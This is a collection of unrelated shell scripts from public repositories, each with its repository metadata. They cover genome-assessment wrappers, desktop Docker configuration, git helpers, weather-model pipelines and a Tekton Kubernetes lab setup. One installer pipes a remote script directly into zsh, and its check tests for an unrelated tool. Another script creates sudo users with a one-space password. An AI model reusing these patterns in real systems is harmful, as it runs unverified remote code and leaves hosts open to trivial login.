sftp -oBatchMode=no -b - "$SSHUSER@uploadserver" << !
cd electrum-downloads-airlock
mput trigger_binaries
bye
!
fi
| true
|
edc526dc28ba79c163eb96973e420fb44676f970
|
Shell
|
c2997108/OpenPortablePipeline
|
/PortablePipeline/scripts/post-assemble~busco_v5
|
UTF-8
| 11,172
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
explanation='
The Benchmarking Universal Single-Copy Ortholog assessment tool.
Based on evolutionarily-informed expectations of gene content of near-universal single-copy orthologs, BUSCO metric is complementary to technical metrics like N50.
'
inputdef='
input_1::An assembled genome file:*.fa,*.fasta,*.fsa,*.fna,*.fa.gz,*.fasta.gz,*.fsa.gz,*.fna.gz
'
optiondef='
opt_c:cpu threads:8
opt_m:memory limit (GB):32
opt_b:orthofinder options:-l eukaryota_odb10 -m genome
'
runcmd="$0 -c #opt_c# -m #opt_m# -b #opt_b# #input_1#"
export IM_BUSCO="ezlabgva/busco:v5.3.2_cv1"
export IM_BASE="c2997108/centos7:metacor7"
source $(dirname `readlink -f $0 || echo $0`)/common.sh
set -eux
set -o pipefail
if [ `echo "$input_1"|grep "[.]gz$"|wc -l||true` = 1 ]; then DO_BASE gzip -dc "$input_1" > `echo "$input_1"|sed 's/[.]gz$//'`; input_1=`echo "$input_1"|sed 's/[.]gz$//'`; fi
DO_BUSCO busco -i "$input_1" -o "`basename \"$input_1\"`".busco -c $N_CPU $opt_b
post_processing
#<option detail>
#<opt_b>
-m MODE, --mode MODE Specify which BUSCO analysis mode to run.
There are three valid modes:
- geno or genome, for genome assemblies (DNA)
- tran or transcriptome, for transcriptome assemblies (DNA)
- prot or proteins, for annotated gene sets (protein)
-l LINEAGE, --lineage_dataset LINEAGE
Specify the name of the BUSCO lineage to be used.
--augustus Use augustus gene predictor for eukaryote runs
--augustus_parameters --PARAM1=VALUE1,--PARAM2=VALUE2
Pass additional arguments to Augustus. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--augustus_species AUGUSTUS_SPECIES
Specify a species for Augustus training.
--auto-lineage Run auto-lineage to find optimum lineage path
--auto-lineage-euk Run auto-placement just on eukaryote tree to find optimum lineage path
--auto-lineage-prok Run auto-lineage just on non-eukaryote trees to find optimum lineage path
-c N, --cpu N Specify the number (N=integer) of threads/cores to use.
--config CONFIG_FILE Provide a config file
--datasets_version DATASETS_VERSION
Specify the version of BUSCO datasets, e.g. odb10
--download [dataset ...]
Download dataset. Possible values are a specific dataset name, "all", "prokaryota", "eukaryota", or "virus". If used together with other command line arguments, make sure to place this last.
--download_base_url DOWNLOAD_BASE_URL
Set the url to the remote BUSCO dataset location
--download_path DOWNLOAD_PATH
Specify local filepath for storing BUSCO dataset downloads
-e N, --evalue N E-value cutoff for BLAST searches. Allowed formats, 0.001 or 1e-03 (Default: 1e-03)
-f, --force Force rewriting of existing files. Must be used when output files with the provided name already exist.
-h, --help Show this help message and exit
--limit N How many candidate regions (contig or transcript) to consider per BUSCO (default: 3)
--list-datasets Print the list of available BUSCO datasets
--long Optimization Augustus self-training mode (Default: Off); adds considerably to the run time, but can improve results for some non-model organisms
--metaeuk_parameters "--PARAM1=VALUE1,--PARAM2=VALUE2"
Pass additional arguments to Metaeuk for the first run. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--metaeuk_rerun_parameters "--PARAM1=VALUE1,--PARAM2=VALUE2"
Pass additional arguments to Metaeuk for the second run. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--offline To indicate that BUSCO cannot attempt to download files
--out_path OUTPUT_PATH
Optional location for results folder, excluding results folder name. Default is current working directory.
-q, --quiet Disable the info logs, displays only errors
-r, --restart Continue a run that had already partially completed.
--tar Compress some subdirectories with many files to save space
--update-data Download and replace with last versions all lineages datasets and files necessary to their automated selection
-v, --version Show this version and exit
Datasets available to be used with BUSCO v4 and v5:
bacteria_odb10
- acidobacteria_odb10
- actinobacteria_phylum_odb10
- actinobacteria_class_odb10
- corynebacteriales_odb10
- micrococcales_odb10
- propionibacteriales_odb10
- streptomycetales_odb10
- streptosporangiales_odb10
- coriobacteriia_odb10
- coriobacteriales_odb10
- aquificae_odb10
- bacteroidetes-chlorobi_group_odb10
- bacteroidetes_odb10
- bacteroidia_odb10
- bacteroidales_odb10
- cytophagia_odb10
- cytophagales_odb10
- flavobacteriia_odb10
- flavobacteriales_odb10
- sphingobacteriia_odb10
- chlorobi_odb10
- chlamydiae_odb10
- chloroflexi_odb10
- cyanobacteria_odb10
- chroococcales_odb10
- nostocales_odb10
- oscillatoriales_odb10
- synechococcales_odb10
- firmicutes_odb10
- bacilli_odb10
- bacillales_odb10
- lactobacillales_odb10
- clostridia_odb10
- clostridiales_odb10
- thermoanaerobacterales_odb10
- selenomonadales_odb10
- tissierellia_odb10
- tissierellales_odb10
- fusobacteria_odb10
- fusobacteriales_odb10
- planctomycetes_odb10
- proteobacteria_odb10
- alphaproteobacteria_odb10
- rhizobiales_odb10
- rhizobium-agrobacterium_group_odb10
- rhodobacterales_odb10
- rhodospirillales_odb10
- rickettsiales_odb10
- sphingomonadales_odb10
- betaproteobacteria_odb10
- burkholderiales_odb10
- neisseriales_odb10
- nitrosomonadales_odb10
- delta-epsilon-subdivisions_odb10
- deltaproteobacteria_odb10
- desulfobacterales_odb10
- desulfovibrionales_odb10
- desulfuromonadales_odb10
- epsilonproteobacteria_odb10
- campylobacterales_odb10
- gammaproteobacteria_odb10
- alteromonadales_odb10
- cellvibrionales_odb10
- chromatiales_odb10
- enterobacterales_odb10
- legionellales_odb10
- oceanospirillales_odb10
- pasteurellales_odb10
- pseudomonadales_odb10
- thiotrichales_odb10
- vibrionales_odb10
- xanthomonadales_odb10
- spirochaetes_odb10
- spirochaetia_odb10
- spirochaetales_odb10
- synergistetes_odb10
- tenericutes_odb10
- mollicutes_odb10
- entomoplasmatales_odb10
- mycoplasmatales_odb10
- thermotogae_odb10
- verrucomicrobia_odb10
archaea_odb10
- thaumarchaeota_odb10
- thermoprotei_odb10
- thermoproteales_odb10
- sulfolobales_odb10
- desulfurococcales_odb10
- euryarchaeota_odb10
- thermoplasmata_odb10
- methanococcales_odb10
- methanobacteria_odb10
- methanomicrobia_odb10
- methanomicrobiales_odb10
- halobacteria_odb10
- halobacteriales_odb10
- natrialbales_odb10
- haloferacales_odb10
eukaryota_odb10
- alveolata_odb10
- apicomplexa_odb10
- aconoidasida_odb10
- plasmodium_odb10
- coccidia_odb10
- euglenozoa_odb10
- fungi_odb10
- ascomycota_odb10
- dothideomycetes_odb10
- capnodiales_odb10
- pleosporales_odb10
- eurotiomycetes_odb10
- chaetothyriales_odb10
- eurotiales_odb10
- onygenales_odb10
- leotiomycetes_odb10
- helotiales_odb10
- saccharomycetes_odb10
- sordariomycetes_odb10
- glomerellales_odb10
- hypocreales_odb10
- basidiomycota_odb10
- agaricomycetes_odb10
- agaricales_odb10
- boletales_odb10
- polyporales_odb10
- tremellomycetes_odb10
- microsporidia_odb10
- mucoromycota_odb10
- mucorales_odb10
- metazoa_odb10
- arthropoda_odb10
- arachnida_odb10
- insecta_odb10
- endopterygota_odb10
- diptera_odb10
- hymenoptera_odb10
- lepidoptera_odb10
- hemiptera_odb10
- mollusca_odb10
- nematoda_odb10
- vertebrata_odb10
- actinopterygii_odb10
- cyprinodontiformes_odb10
- tetrapoda_odb10
- mammalia_odb10
- eutheria_odb10
- euarchontoglires_odb10
- glires_odb10
- primates_odb10
- laurasiatheria_odb10
- carnivora_odb10
- cetartiodactyla_odb10
- sauropsida_odb10
- aves_odb10
- passeriformes_odb10
- stramenopiles_odb10
- viridiplantae_odb10
- chlorophyta_odb10
- embryophyta_odb10
- liliopsida_odb10
- poales_odb10
- eudicots_odb10
- brassicales_odb10
- fabales_odb10
- solanales_odb10
viruses (no root dataset)
- alphaherpesvirinae_odb10
- baculoviridae_odb10
- rudiviridae_odb10
- betaherpesvirinae_odb10
- herpesviridae_odb10
- poxviridae_odb10
- tevenvirinae_odb10
- aviadenovirus_odb10
- enquatrovirus_odb10
- teseptimavirus_odb10
- bclasvirinae_odb10
- fromanvirus_odb10
- skunavirus_odb10
- betabaculovirus_odb10
- pahexavirus_odb10
- alphabaculovirus_odb10
- tunavirinae_odb10
- simplexvirus_odb10
- gammaherpesvirinae_odb10
- varicellovirus_odb10
- cheoctovirus_odb10
- guernseyvirinae_odb10
- tequatrovirus_odb10
- chordopoxvirinae_odb10
- peduovirus_odb10
- iridoviridae_odb10
- spounavirinae_odb10
#</opt_b>
#</option detail>
| true
|
af9be541d81becb7528c94196538b8128b095ab5
|
Shell
|
redbull05689/k1s
|
/join
|
UTF-8
| 248
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
IP="192.168.56.120"
if [[ $EUID -ne 0 ]]; then echo "root required" 1>&2; exit 1; fi
cat << EOF > /etc/default/kubelet
KUBELET_EXTRA_ARGS="--node-ip=$IP"
EOF
# Вот сюда можно вставить команду kubeadm join
| true
|
56257b1f8ee17279fabef5abee9ccffcf9c5512e
|
Shell
|
velcrine/lightmachine.dockerfile
|
/build-scripts/configuration.sh
|
UTF-8
| 4,184
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# here, we just provide configs for installed packages
set -ex
lxde() {
#bug in lxpolkit, it says "session not found for pid of lxpolkit" https://github.com/meefik/linuxdeploy/issues/978
mv /usr/bin/lxpolkit /usr/bin/lxpolkit.bak
mkdir -p /etc/skel/.config/pcmanfm/LXDE/
echo "
[*]
wallpaper_mode=stretch
wallpaper_common=1
wallpaper=/dockerstation/wallpaper.jpg
" >/etc/skel/.config/pcmanfm/LXDE/desktop-items-0.conf
echo '[Added Associations]
text/plain=mousepad.desktop;
' >/etc/skel/.config/mimeapps.list
echo "
[Desktop Entry]
Type=Link
Name=LXTerminal
Icon=lxterminal
URL=/usr/share/applications/lxterminal.desktop
" >/etc/skel/Desktop/lxterminal.desktop
echo "startlxde" >>/dockerstation/run-scripts/desktopenv.sh
}
lxqt(){
# set theme icons and font; must for lxqt
mkdir -p /etc/skel/.config/lxqt
echo '
[General]
__userfile__=true
icon_theme=Adwaita
single_click_activate=false
theme=ambiance
tool_button_style=ToolButtonTextBesideIcon
[Qt]
doubleClickInterval=400
font="Sans,11,-1,5,50,0,0,0,0,0"
style=Fusion
wheelScrollLines=3
' >/etc/skel/.config/lxqt/lxqt.conf
# set wallpaper and properties
mkdir -p /etc/skel/.config/pcmanfm-qt/lxqt
echo '
[Desktop]
ShowHidden=true
Wallpaper=/dockerstation/wallpaper.jpg
WallpaperMode=stretch
' >/etc/skel/.config/pcmanfm-qt/lxqt/settings.conf
# add quicklaunch for terminal
echo "
[quicklaunch]
alignment=Left
apps\1\desktop=/usr/share/applications/qterminal_drop.desktop
apps\2\desktop=/usr/share/applications/pcmanfm-qt.desktop
apps\3\desktop=/usr/share/applications/juffed.desktop
apps\size=3
type=quicklaunch
" > /etc/skel/.config/lxqt/panel.conf
#qterminal shortcuts
mkdir -p /etc/skel/.config/qterminal.org/
echo '
[General]
AskOnExit=false
[Shortcuts]
Copy%20Selection="Ctrl+Shift+C, Ctrl+X"
Paste%20Clipboard="Ctrl+Shift+V, Ctrl+V"
' > /etc/skel/.config/qterminal.org/qterminal.ini
echo "
[General]
__userfile__=true
blackList=lxqt-panel
placement=top-right
server_decides=1" > /etc/skel/.config/lxqt/notifications.conf
echo "startlxqt" >>/dockerstation/run-scripts/desktopenv.sh
}
gnome() {
#starting dbus; it supresses some warnings during running gnome-session
dbus-uuidgen >/var/lib/dbus/machine-id
mkdir -p /var/run/dbus
dbus-daemon --config-file=/usr/share/dbus-1/system.conf --print-address
echo "gnome-session" >>/dockerstation/run-scripts/desktopenv.sh
}
node() {
#keep image updated, as probably it is going to be used out of the box for development or debugging
apt-get update
# shipping with atleast a user to start with, if entrypoint is overriden
useradd -u 9998 -d /home/debug -G sudo -m -p "$(openssl passwd -1 " ")" -s /bin/bash debug
#creating a user with name "node" and password " "
echo 'useradd -u 9999 -d /home/node -G sudo -m -p "$(openssl passwd -1 " ")" -s /bin/bash node' >> /usr/local/bin/start
echo "cd /home/node; sudo -u node /bin/bash" >>/usr/local/bin/start
}
common_config() {
mkdir /dockerstation/run-scripts
mkdir -p /etc/skel/.config/
mkdir -p /etc/skel/Desktop/
sh -c 'echo "*.log\n" >/etc/skel/.gitignore'
echo "#!/bin/sh
set -ex
# user can attach his own init.sh using docker's -v flag.
# but strict note must be followed that it should only follow the pattern in original init.sh
# for custom or additional setup use app-init.sh as done below
[ -e /dockerstation/run-scripts/init.sh ] && . /dockerstation/run-scripts/init.sh" > /dockerstation/run-scripts/entrypoint.sh
echo "
# user can provide any script here to create env for target app during init time
[ -e /dockerstation/run-scripts/app-init.sh ] && . /dockerstation/run-scripts/app-init.sh" >> /dockerstation/run-scripts/entrypoint.sh
echo 'sudo -u ${USERNAME} sh /dockerstation/run-scripts/desktopenv.sh' >> /dockerstation/run-scripts/entrypoint.sh
chmod a+x /dockerstation/run-scripts/entrypoint.sh
}
case "${1}" in
"gnome3")
common_config
gnome
editor=gedit
;;
"lxqt")
common_config
lxqt
editor=featherpad
;;
"lxde")
common_config
lxde
editor=mousepad
;;
"node")
common_config
node
editor=nano
;;
*)
echo "$0 [gnome3 | lxde | node]"
exit 1
;;
esac
echo "EDITOR=$editor" >/etc/environment
| true
|
9476a958ed31a3b527a92e3ce4ef47360885fced
|
Shell
|
oracle-quickstart/oci-ibm-spectrum-scale
|
/clients_only_cluster_scripts/deploy_spectrum_scale.sh
|
UTF-8
| 398
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -x
source /tmp/gpfs_env_variables.sh
# Build the GPFS potability layer.
/usr/lpp/mmfs/bin/mmbuildgpl
# have seen the above fail sometimes, hence the below loop
while [ $? -ne 0 ]; do
sleep 10s;
/usr/lpp/mmfs/bin/mmbuildgpl
done;
# Up date the PATH environmental variable.
echo -e '\nexport PATH=/usr/lpp/mmfs/bin:$PATH' >> ~/.bash_profile
source ~/.bash_profile
exit 0;
| true
|
bad67bf68f49182d402baede204184b6439aab72
|
Shell
|
Foxytine31/gitpush
|
/gitpush.sh
|
UTF-8
| 891
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
RESET="\033[0m"
REDCOLOR="\033[31m"
GREENCOLOR="\033[32m"
current_branch=`git branch | awk '/\*/ {print $2}'`
clear
echo -e $GREENCOLOR"--------------------------------------- STARTING PUSH -------------------------------------------"$RESET
git checkout master && git pull origin master && git checkout $current_branch && git rebase master && git checkout master && git pull origin master && git merge $current_branch && git push origin master && git checkout $current_branch || {
echo -e $REDCOLOR"----------------------------------- PUSH FAILED (SEE ERRORS)-------------------------------------"$RESET;
echo -e $REDCOLOR"---- Most likely, you will just need to run 'git mergetool' and then 'git rebase --continue' ----"$RESET;
exit 1;
}
echo -e $GREENCOLOR"--------------------------------- PUSH AND REBASE SUCCESSFUL ------------------------------------"$RESET
| true
|
5295432ca63d2c44e25d7623060ae7cf8be76da8
|
Shell
|
Chrismarsh/SnowCast
|
/NWP_Forcing/Update_GDPS.sh
|
UTF-8
| 1,588
| 3.359375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
# Stop of get any simple error
set -e
# This is needed because crontab does not have same env variables are user
PATH=$PATH:/home/nwayand/custom/anaconda2:/home/nwayand/custom/anaconda2/bin:/home/nwayand/custom/anaconda2/bin
# Timer
start=$SECONDS
## Script paths
# Where scripts are located
ex_dir=/home/nwayand/SnowCast/NWP_Forcing/
# CHM run dir
CHM_dir=/home/nwayand/snow_models/output_CHM/SnowCast/CHM_Configs/
# Config file to use
#Configfile=Config_GEM_west_fortress.py
Configfile=Configs/Config_GDPS_append.py
# Download GEM forecast
echo Downloading GEM
/home/nwayand/custom/anaconda2/bin/python $ex_dir"Download/Download_GDPS_GRIB2.py" $ex_dir$Configfile
# Subset grib2 files (global) to Canada
echo Subsetting GDPS grib2 files
/home/nwayand/SnowCast/NWP_Forcing/Util/sub_set_grib2_files.sh /media/data3/nicway/GEM/GDPS/grib2_current
# Format grib2 to netcdf
echo Formating grib2 to netcdf
/home/nwayand/custom/anaconda2/envs/pynio/bin/python $ex_dir"GRIB2_to_NETCDF/GRIB2_GDPS_to_Netcdf.py" $ex_dir$Configfile
# Convert archived netcdf to CHM forcing
echo NETCDF to CHM ASCII Forcing
/home/nwayand/custom/anaconda2/bin/python $ex_dir"NETCDF_to_CHM_ASCII/Netcdf_Day_Chunk_to_CHM_forcing_GDPS.py" $ex_dir$Configfile
##/home/nwayand/custom/anaconda2/bin/python $ex_dir"Netcdf_Day_Chunk_to_CHM_forcing.py" $ex_dir$Configfile
##/home/nwayand/custom/anaconda2/bin/python $ex_dir"Netcdf_to_CHM_forcing.py" $ex_dir$Configfile
# Run CHM for available forcing period
$CHM_dir"Run_GDPS_CHM_Current.sh"
duration=$(( SECONDS - start ))
echo Took $duration seconds
| true
|
d7690c60f95fbf9baa908fa3afb056d6d20becac
|
Shell
|
pixelastic/oroshi
|
/scripts/bin/text-trim
|
UTF-8
| 233
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
# Trim starting and trailing whitespace from a string
# Read from arg or from pipe
local input=$1
[[ -p /dev/stdin ]] && input="$(cat -)"
# Pass through awk to remove whitespace
echo $input | awk '{$1=$1;print}'
| true
|
b77830a32ba528802768116b0206304bb12acc78
|
Shell
|
RIAPS/riaps-pycom
|
/src/scripts/riaps-dev.ctrl
|
UTF-8
| 350
| 2.515625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# For riaps app developers:
# Starts up the riaps controller on the mininet
# To be run on the 'lead' node
# Add default gateway
route add default gw 10.0.0.1
# Start registry - start it on one node only
/usr/local/bin/rpyc_registry.py &
# Change to (non-privileged) user and run the controller
sudo -E -u $SUDO_USER `which riaps_ctrl`
| true
|
97536ae7f2980b35c3625ef350dad516f17228fd
|
Shell
|
nguyenduclong-ict/linux_development--Lap-trinh-Linux-
|
/Bai7(2)/tam_giac_so
|
UTF-8
| 154
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
sott=1
for (( i = 1; i <= 4 ; i++ ))
do
for (( j = 1 ; j <= i; j++ ))
do
echo -n $sott " "
sott=$((sott+1))
done
echo
done
exit 0;
| true
|
6f89fd0f03550cd32115afe72ee6a61df07f187b
|
Shell
|
kin0025/COSC1076-A2
|
/testfiles
|
UTF-8
| 253
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
#Search for line number length
for f in *.c *.h; do
echo -en $f '\t'
awk '{print length, $0}' $f 2>/dev/null| sort -nr | head -1
done
echo
#Checks for unix line endings
file *.c *.h
#Search for unedited headers
grep "EDIT HERE" *.c *.h
| true
|
6457507c405b0fd1c4acc020a6a71967c351ec27
|
Shell
|
jsoverson/dotfiles
|
/install/linux/zulu
|
UTF-8
| 167
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
if [[ ! -x wasm2wat ]]; then
curl -L https://zulu.molovo.co/install | zsh && zsh
else
echo "Found wasm2wat in path, not reinstalling wabt"
fi
| true
|
14cce081f50de4d98e7136d84b7116f767614be5
|
Shell
|
AlanGreene/katacoda-scenarios
|
/tekton-playground-kubernetes/background.sh
|
UTF-8
| 11,723
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Start Kubernetes
echo "Starting cluster"
launch.sh
echo "done" >> /opt/.clusterstarted
echo "Installing Tekton Pipelines"
kubectl apply --filename https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.13.2/release.yaml
mkdir /mnt/data
kubectl apply -f - << EOF
apiVersion: v1
kind: PersistentVolume
metadata:
name: task-pv-volume
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/mnt/data"
EOF
kubectl delete configmap/config-artifact-pvc -n tekton-pipelines
kubectl create configmap config-artifact-pvc --from-literal=storageClassName=manual -n tekton-pipelines
echo "done" >> /opt/.pipelinesinstalled
echo "Installing Tekton Dashboard"
# kubectl apply --filename https://github.com/tektoncd/dashboard/releases/download/v0.7.0/tekton-dashboard-release.yaml
kubectl apply -f - << EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: extensions.dashboard.tekton.dev
spec:
group: dashboard.tekton.dev
names:
categories:
- tekton
- tekton-dashboard
kind: Extension
plural: extensions
scope: Namespaced
subresources:
status: {}
version: v1alpha1
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-backend
rules:
- apiGroups:
- apiextensions.k8s.io
resources:
- customresourcedefinitions
verbs:
- get
- list
- apiGroups:
- security.openshift.io
resources:
- securitycontextconstraints
verbs:
- use
- apiGroups:
- route.openshift.io
resources:
- routes
verbs:
- get
- list
- apiGroups:
- extensions
- apps
resources:
- ingresses
verbs:
- get
- list
- watch
- apiGroups:
- ""
resources:
- services
verbs:
- get
- list
- watch
- apiGroups:
- dashboard.tekton.dev
resources:
- extensions
verbs:
- get
- list
- watch
- apiGroups:
- tekton.dev
resources:
- clustertasks
- clustertasks/status
verbs:
- get
- list
- watch
- apiGroups:
- triggers.tekton.dev
resources:
- clustertriggerbindings
verbs:
- get
- list
- watch
- apiGroups:
- dashboard.tekton.dev
resources:
- extensions
verbs:
- create
- update
- delete
- patch
- apiGroups:
- tekton.dev
resources:
- clustertasks
- clustertasks/status
verbs:
- create
- update
- delete
- patch
- apiGroups:
- triggers.tekton.dev
resources:
- clustertriggerbindings
verbs:
- create
- update
- delete
- patch
- add
---
aggregationRule:
clusterRoleSelectors:
- matchLabels:
rbac.dashboard.tekton.dev/aggregate-to-dashboard: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-extensions
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-pipelines
rules:
- apiGroups:
- apps
resources:
- deployments
verbs:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-tenant
rules:
- apiGroups:
- ""
resources:
- serviceaccounts
- pods/log
- namespaces
verbs:
- get
- list
- watch
- apiGroups:
- tekton.dev
resources:
- tasks
- taskruns
- pipelines
- pipelineruns
- pipelineresources
- conditions
- tasks/status
- taskruns/status
- pipelines/status
- pipelineruns/status
- taskruns/finalizers
- pipelineruns/finalizers
verbs:
- get
- list
- watch
- apiGroups:
- triggers.tekton.dev
resources:
- eventlisteners
- triggerbindings
- triggertemplates
verbs:
- get
- list
- watch
- apiGroups:
- ""
resources:
- serviceaccounts
verbs:
- update
- patch
- apiGroups:
- ""
resources:
- secrets
verbs:
- get
- list
- watch
- create
- update
- delete
- apiGroups:
- tekton.dev
resources:
- tasks
- taskruns
- pipelines
- pipelineruns
- pipelineresources
- conditions
- taskruns/finalizers
- pipelineruns/finalizers
- tasks/status
- taskruns/status
- pipelines/status
- pipelineruns/status
verbs:
- create
- update
- delete
- patch
- apiGroups:
- triggers.tekton.dev
resources:
- eventlisteners
- triggerbindings
- triggertemplates
verbs:
- create
- update
- delete
- patch
- add
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-triggers
rules:
- apiGroups:
- apps
resources:
- deployments
verbs:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-backend
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-backend
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-extensions
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-extensions
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-pipelines
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-pipelines
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-tenant
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-tenant
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-triggers
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-triggers
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: v1
kind: Service
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
dashboard.tekton.dev/release: v0.7.0
version: v0.7.0
name: tekton-dashboard
namespace: tekton-pipelines
spec:
ports:
- name: http
port: 9097
protocol: TCP
targetPort: 9097
selector:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
dashboard.tekton.dev/release: v0.7.0
version: v0.7.0
name: tekton-dashboard
namespace: tekton-pipelines
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
template:
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
name: tekton-dashboard
spec:
containers:
- args:
- --port=9097
- --web-dir=/var/run/ko
- --csrf-secure-cookie=false
env:
- name: INSTALLED_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: index.docker.io/alangreene/dashboard-9623576a202fe86c8b7d1bc489905f86@sha256:bcb53087bd17bb66f38fdc8a0e48ce9a4ae9d98c3a40890f263ba3b7073d31ff
livenessProbe:
httpGet:
path: /health
port: 9097
name: tekton-dashboard
ports:
- containerPort: 9097
readinessProbe:
httpGet:
path: /readiness
port: 9097
securityContext:
runAsNonRoot: true
serviceAccountName: tekton-dashboard
volumes: []
---
EOF
echo "done" >> /opt/.dashboardinstalled
echo "Installing Tekton CLI"
curl -LO https://github.com/tektoncd/cli/releases/download/v0.10.0/tkn_0.10.0_Linux_x86_64.tar.gz
tar xvzf tkn_0.10.0_Linux_x86_64.tar.gz -C /usr/local/bin/ tkn
echo "done" >> /opt/.tkninstalled
echo "Waiting for Tekton pods to be ready"
kubectl wait pod -n tekton-pipelines --all --for=condition=Ready --timeout=90s
echo "done" >> /opt/.podsready
echo "Configure ingress"
# kubectl create ns nginx-ingress
# helm repo add stable https://kubernetes-charts.storage.googleapis.com
# helm install --namespace nginx-ingress nginx-ingress stable/nginx-ingress
# # helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
# # helm install --namespace ingress-nginx ingress-nginx ingress-nginx/ingress-nginx
# kubectl wait --namespace nginx-ingress \
# --for=condition=ready pod \
# --selector=app.kubernetes.io/component=controller \
# --timeout=120s
# # kubectl --namespace ingress-nginx get services -o wide -w ingress-nginx-controller
# kubectl apply -f - << EOF
# apiVersion: networking.k8s.io/v1beta1
# kind: Ingress
# metadata:
# name: tekton-dashboard
# namespace: tekton-pipelines
# spec:
# backend:
# serviceName: tekton-dashboard
# servicePort: 9097
# EOF
kubectl --namespace tekton-pipelines port-forward --address=0.0.0.0 service/tekton-dashboard 9097:9097 &
echo "done" >> /opt/.ingressconfigured
